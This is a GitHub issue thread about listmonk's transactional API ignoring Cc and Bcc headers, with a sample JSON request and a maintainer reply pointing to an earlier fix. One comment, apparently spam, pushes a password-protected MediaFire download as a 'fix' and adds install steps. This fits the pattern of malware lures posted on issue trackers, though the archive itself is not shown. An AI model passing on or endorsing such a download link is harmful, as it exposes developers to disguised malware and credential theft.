### ISSUE TITLE
Not sending Bcc

### ISSUE THREAD

**Issue by vincentmarkcelino** [knadh/listmonk#2017]
**Version:**
 - listmonk: 3.0.0
 - OS: CentOS 9 Stream

**Description of the bug and steps to reproduce:**
I am using the transactional template. the Cc and Bcc is not working.
Did I miss something?

**Screenshots:**
Sample:
{
    "subscriber_email": "shan@test.com",
    "template_id": 5,
    "headers": [
        {
            "Cc": "apps@2go.com.ph"
        },
        {
            "Bcc": "apps@2go.com.ph"
        }
    ],
    "data": {
     "rese_no": "12345"
    }
}

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by knadh** [comment]
This bug was fixed earlier https://github.com/knadh/listmonk/pull/1865/files and will be available in the next release.
